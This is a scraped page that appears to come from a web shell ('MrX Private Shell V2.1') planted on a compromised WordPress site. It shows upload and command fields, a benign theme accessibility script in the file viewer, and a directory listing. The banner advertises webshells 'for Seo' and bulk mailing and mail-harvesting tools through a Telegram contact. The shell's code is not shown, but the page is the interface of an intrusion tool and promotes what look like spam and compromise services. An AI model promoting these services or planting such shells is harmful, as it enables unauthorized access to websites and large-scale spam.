__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/**
 * File skip-link-focus-fix.js
 *
 * Helps with accessibility for keyboard only users.
 * This is the source file for what is minified in the astra_skip_link_focus_fix() PHP function.
 *
 * Learn more: https://github.com/Automattic/_s/pull/136
 *
 * @package Astra
 */

( function() {
	var is_webkit = navigator.userAgent.toLowerCase().indexOf( 'webkit' ) > -1,
	    is_opera  = navigator.userAgent.toLowerCase().indexOf( 'opera' ) > -1,
	    is_ie     = navigator.userAgent.toLowerCase().indexOf( 'msie' ) > -1;

	if ( ( is_webkit || is_opera || is_ie ) && document.getElementById && window.addEventListener ) {
		window.addEventListener( 'hashchange', function() {
			var id = location.hash.substring( 1 ),
				element;

			if ( ! ( /^[a-zA-Z0-9_-]+$/.test( id ) ) ) {
				return;
			}

			element = document.getElementById( id );

			if ( element ) {
				if ( ! ( /^(?:a|select|input|button|textarea)$/i.test( element.tagName ) ) ) {
					element.tabIndex = -1;
				}

				element.focus();
			}
		}, false );
	}
})();

Filemanager

Name Type Size Permission Actions
add-to-cart-quantity-btn.js File 10.95 KB 0640
customizer-controls-toggle.js File 2.62 KB 0640
customizer-controls.js File 3.07 KB 0640
customizer-preview.js File 131.55 KB 0640
customizer-quick-tour.js File 1.8 KB 0640
customizer-style-guide.js File 3.37 KB 0640
extend-customizer.js File 6.38 KB 0640
flexibility.js File 25.13 KB 0640
frontend-pro.js File 6.73 KB 0640
frontend.js File 49.21 KB 0640
live-search.js File 5 KB 0640
mobile-cart.js File 11.13 KB 0640
navigation.js File 25.93 KB 0640
shop-add-to-cart.js File 1.21 KB 0640
skip-link-focus-fix.js File 1 KB 0640
sticky-add-to-cart.js File 1.42 KB 0640
sticky-sidebar.js File 3.07 KB 0640
style-guide-previewer.js File 1002 B 0640
style.js File 25.93 KB 0640
Filemanager